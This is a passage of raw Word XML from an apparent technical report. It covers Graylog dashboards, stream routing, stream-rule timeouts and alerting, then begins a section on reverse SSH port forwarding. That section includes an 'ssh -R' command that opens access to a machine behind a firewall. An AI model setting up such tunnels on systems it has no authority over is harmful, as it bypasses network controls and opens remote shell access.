          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="0033426A" w:rsidRDefault="0033426A" w:rsidP="0033426A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="004E0912">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/architecture.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004E0912" w:rsidRPr="004E0912" w:rsidRDefault="004E0912" w:rsidP="004E0912"/>
    <w:p w:rsidR="003371FE" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Displaying log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5A92" w:rsidRPr="007C5A92" w:rsidRDefault="007C5A92" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004E0912">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Using dashboards</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allow Graylog to </w:t>
      </w:r>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve">manage pre-defined views on our log data to always show everything important that administrators </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0912">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve"> get the eyes on. Dashboard supports many kinds for displaying the information without any effort for finding it in a bunch of data. Any data that we want to be shown will not only be shown up as plaintext, but it also can be parsed and graphically displayed by chart, table, statistic assumption and measurement. The amount of information grows by the flying of time, and it will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0912">
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0912">
        <w:t xml:space="preserve"> larger and larger until a point that no normal search effort in the bunch of everything can tell us where the information we need is lying. </w:t>
      </w:r>
      <w:r w:rsidR="004E0912">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">With the help of dashboard, system administrators those want to protect their network will receive information on time. They can immediately know what is happening to their system and can rapidly deduce a solution for protecting the system.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003371FE" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>An example dashboard is shown in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCD39C6" wp14:editId="6A9F8C4A">
            <wp:extent cx="5581650" cy="36302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1650" cy="3630295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRPr="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc483834787"/>
      <w:bookmarkStart w:id="63" w:name="_Toc484886351"/>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example of a dashboard.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRPr="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="008D3B35">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="008D3B35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/dashboards.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D3B35" w:rsidRDefault="008D3B35" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3B35">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Streaming and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="009F4123" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53CB7">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Graylog streams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are a mechanism to route messages into categories in realtime while they are processed </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1235779385"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Gra2 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(17)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006A2017">
        <w:t>. When stream wants a message to be route to it, it define</w:t>
      </w:r>
      <w:r w:rsidR="00E53CB7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A2017">
        <w:t xml:space="preserve"> a rule that any message which matches the rules will be route directly to the stream.</w:t>
      </w:r>
      <w:r w:rsidR="00E53CB7">
        <w:t xml:space="preserve"> Therefore, stream can be defined as a flow of messages those has similar content.  Streams are processed in realtime by the help of pipelines. </w:t>
      </w:r>
      <w:r w:rsidR="00763FEA">
        <w:t xml:space="preserve">Every message that comes in is matched against the rules of a stream. For message that match any or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00763FEA">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00763FEA">
        <w:t xml:space="preserve"> the stream rules, the internal ID of that stream is stored in the streams array of that processed message. Therefore, any analysis, searches or alerts that bound to streams can now simply check the stream array base on the stream ID.</w:t>
      </w:r>
      <w:r w:rsidR="00AC1E06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F06FEA">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F06FEA" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The figure below graphical demonstrates that messages are processed in stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00AC1E06" w:rsidP="00F06FEA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06FEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5581650" cy="5628098"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="../_images/internal_stream_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internal_stream_processing.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1650" cy="5628098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRPr="00F06FEA" w:rsidRDefault="00F06FEA" w:rsidP="00F06FEA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc483834788"/>
      <w:bookmarkStart w:id="65" w:name="_Toc484886352"/>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Messages are processed in stream.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="00E53CB7" w:rsidRDefault="00F06FEA" w:rsidP="00F06FEA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06FEA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00F06FEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/streams.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C596B" w:rsidRPr="00F95A3B" w:rsidRDefault="00F95A3B" w:rsidP="007C596B">
      <w:r>
        <w:t xml:space="preserve">Messages sent by collector agent to the Input interface of Graylog server, are driven to a filter chain in which messages are classified base on pre-defined rules. The stream rules are store in MongoDB server of Graylog, which are treated as configurations for stream processing. The message that have been route to stream, is tagged a stream ID that help </w:t>
      </w:r>
      <w:r w:rsidR="007C596B">
        <w:t>Graylog to easily find that message base on which stream it is belong to. The message, after being classified by stream, is route to output interface which is under management of Elasticsearch. Message can also be sent to other Graylog server or Elasticsearch server due to the cluster environment that Graylog are configured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06FEA" w:rsidRDefault="00F95A3B" w:rsidP="00F06FEA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The crucial problem when processing messages is the time for classif</w:t>
      </w:r>
      <w:r w:rsidR="007C596B">
        <w:t>ying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which message </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be routed to which stream. </w:t>
      </w:r>
      <w:r w:rsidR="00D7500C">
        <w:t xml:space="preserve">Applying stream rules is done during the indexing of a message only, so the time spent for classifying message might become an overhead problem if it takes too long, which could lead to slow down the overall performance of Graylog system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D192C" w:rsidRDefault="00D7500C" w:rsidP="004D192C">
      <w:r>
        <w:t xml:space="preserve">There could be any scenarios when a stream rule takes too long to match, therefore </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t xml:space="preserve"> large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> messages have to be waited</w:t>
      </w:r>
      <w:r w:rsidR="004D192C">
        <w:t xml:space="preserve">. The message processing can be stall, therefore, those waiting messages </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004D192C">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004D192C">
        <w:t xml:space="preserve"> stand in the system memory, that could lead to the memory runs out and the whole system could become non-responsive. To prevent this, the runtime of stream rule matching is limited for it cannot make other messages wait for too long. </w:t>
      </w:r>
      <w:r w:rsidR="004D192C" w:rsidRPr="004D192C">
        <w:t xml:space="preserve">When it is taking longer than the configured runtime limit, the process of matching this message </w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t>against</w:t>
      </w:r>
      <w:r w:rsidR="004D192C" w:rsidRPr="004D192C">
        <w:t xml:space="preserve"> the rules of this specific stream is aborted.</w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA3EC9" w:rsidRPr="00EA3EC9">
        <w:t>If the number of recorded faults for a single stream is higher than a configured threshold, the stream rule set of this stream is considered faulty and the stream is disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0486E" w:rsidRDefault="00C0486E" w:rsidP="004D192C">
      <w:r w:rsidRPr="00C0486E">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Graylog alerts base on stream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Administrator can define conditions for triggering the alert based on the stream he is following. </w:t>
      </w:r>
      <w:r w:rsidR="004A1113">
        <w:t xml:space="preserve">Like stream, Graylog acts to alert on a stream base on rules </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-43907198"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:instrText xml:space="preserve"> CITATION Gra3 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(18)</w:t>
          </w:r>
          <w:r w:rsidR="004A1113">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004A1113">
        <w:t>. When a stream satisfies just one or all the rules (depends on how we define our rule’s conditions), Graylog trigger the alert process and sends alert message to administrators. An alert can have two states:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1113" w:rsidRDefault="004A1113" w:rsidP="004A1113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unresolved: Alert has an unresolved state while the defined condition is satisfied. New alerts are triggered in this state, and they also execute the notifications attached to the stream. These alerts usually require action from administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1113" w:rsidRPr="00F06FEA" w:rsidRDefault="004A1113" w:rsidP="004A1113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resolved: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1113">
        <w:t>Graylog automatically resolves alerts once their alert condition is no longer satisfied. This is the final state of an alert, as Graylog will create a new alert if the alert condition is satisfied again in the future</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="00872321" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog supports some methods for sending alerts to administrator. Alert messages can be sent to administrator via email, http protocol, alert on the alert interface of Graylog, and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003802AB" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00344A17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse SSH Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>Reverse SSH Port Forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. To try to put this as simple as can be, Reverse SSH is a technique through which you can access systems that are behind a firewall from the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="00344A17">
        <w:t>So instead of your machine doing a simple SSH, the server does an SSH and through the port forwarding makes sure that you can SSH back to the server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>How to reverse ssh port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D073C">
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D073C">
        <w:t xml:space="preserve"> SSH into a machine behind a firewall you will need to use Reverse SSH Port Forwarding. The machine in question needs to open an SSH connection to the outside world and include a -R tunnel whose entry point is the remote side (from server in our example) to connect to your machine, allocate a port there and make certain that any connection request on that port is then forwarded to the SSH port of the remote side (server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:r w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>From the remote server side run the following command on the server:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D073C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRPr="007D073C" w:rsidRDefault="00A53CB7" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">sh –R 2210:localhost:22 </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="007D073C" w:rsidRPr="007D073C">
          <w:rPr>
            <w:i/>
          </w:rPr>
          <w:t>username@yourMachine.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="007D073C" w:rsidP="007D073C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D073C">
        <w:t>Install and configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Config Generating SSH keys</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a@</w:t>
      </w:r>
